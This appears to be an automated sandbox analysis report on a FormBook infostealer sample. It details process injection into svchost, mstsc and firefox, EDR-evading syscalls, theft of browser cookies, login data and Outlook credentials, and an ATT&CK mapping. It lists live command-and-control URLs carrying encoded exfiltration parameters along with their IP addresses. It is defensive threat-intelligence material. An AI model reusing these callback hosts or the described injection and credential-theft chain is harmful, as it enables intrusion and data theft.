            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 7156Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\mstsc.exeThread APC queued: target process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2872008Jump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074BE95 LogonUserW,0_2_0074BE95
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0071374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_0071374E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00754B52 SendInput,keybd_event,0_2_00754B52
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00757DD5 mouse_event,0_2_00757DD5
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0074B398
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0074BE31
            Source: DOC092024-0431202229487.exe, NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: DOC092024-0431202229487.exe, 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00737254 cpuid 0_2_00737254
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007340DA GetSystemTimeAsFileTime,__aulldiv,0_2_007340DA
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0078C146 GetUserNameW,0_2_0078C146
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00742C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00742C3C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0072E47B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DOC092024-0431202229487.exe, 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_81
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_XP
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_XPe
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_VISTA
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_7
            Source: DOC092024-0431202229487.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007691DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007691DC
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007696E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007696E2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		31
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            Software Packing            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            DLL Side-Loading            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509246 Sample: DOC092024-0431202229487.exe Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 28 www.rtpngk.xyz 2->28 30 www.heldhold.xyz 2->30 32 26 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 4 other signatures 2->50 10 DOC092024-0431202229487.exe 5 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 NZuQxWwOkTbZ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mstsc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 NZuQxWwOkTbZ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.heldhold.xyz 67.223.117.189, 63329, 63330, 63331 VIMRO-AS15189US United States 22->34 36 www.mfgarage.net 85.153.138.113, 63349, 63350, 63351 TELECABLESpainES Turkey 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DOC092024-0431202229487.exe24%ReversingLabsWin32.Trojan.Formbooks
            DOC092024-0431202229487.exe29%VirustotalBrowse
            DOC092024-0431202229487.exe100%AviraHEUR/AGEN.1319153
            DOC092024-0431202229487.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            webredir.vip.gandi.net0%VirustotalBrowse
            linkwave.cloud0%VirustotalBrowse
            40wxd.top0%VirustotalBrowse
            doggieradio.net0%VirustotalBrowse
            030002304.xyz0%VirustotalBrowse
            206.23.85.13.in-addr.arpa1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.40wxd.top/v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta80%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=ultraleap.net0%Avira URL Cloudsafe
            http://www.b5x7vk.agency/zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs=0%Avira URL Cloudsafe
            http://www.linkwave.cloud/al6z/0%Avira URL Cloudsafe
            http://www.linkwave.cloud/al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta80%Avira URL Cloudsafe
            http://www.doggieradio.net/hzuv/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.030002304.xyz/tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta80%Avira URL Cloudsafe
            http://www.b5x7vk.agency/zznj/0%Avira URL Cloudsafe
            http://www.heldhold.xyz/fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta80%Avira URL Cloudsafe
            http://www.kfowks.site/c0yj/0%Avira URL Cloudsafe
            https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FpP_8%3DnzWo0%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta80%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.030002304.xyz/tmpg/0%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta80%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/0%Avira URL Cloudsafe
            http://www.kfowks.site0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/0%Avira URL Cloudsafe
            http://www.mfgarage.net/3lu7/0%Avira URL Cloudsafe
            http://www.useanecdotenow.tech/68ac/0%Avira URL Cloudsafe
            http://www.2bhp.com/a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ=0%Avira URL Cloudsafe
            http://www.rtpngk.xyz/altr/0%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA=0%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/0%Avira URL Cloudsafe
            http://www.heldhold.xyz/fava/0%Avira URL Cloudsafe
            https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3Q0%Avira URL Cloudsafe
            http://www.40wxd.top/v4cy/0%Avira URL Cloudsafe
            https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK0%Avira URL Cloudsafe
            http://www.doggieradio.net/hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8=0%Avira URL Cloudsafe
            http://www.useanecdotenow.tech/68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU=0%Avira URL Cloudsafe
            http://www.mgeducacaopro.online/xamn/0%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta80%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrueunknown
            useanecdotenow.tech
            		3.33.130.190
            		truetrue
              		unknown
              www.kfowks.site
              		38.181.141.122
              		truetrue
                		unknown
                dalong.site
                		172.96.187.60
                		truetrue
                  		unknown
                  www.b5x7vk.agency
                  		104.21.11.31
                  		truetrue
                    		unknown
                    www.heldhold.xyz
                    		67.223.117.189
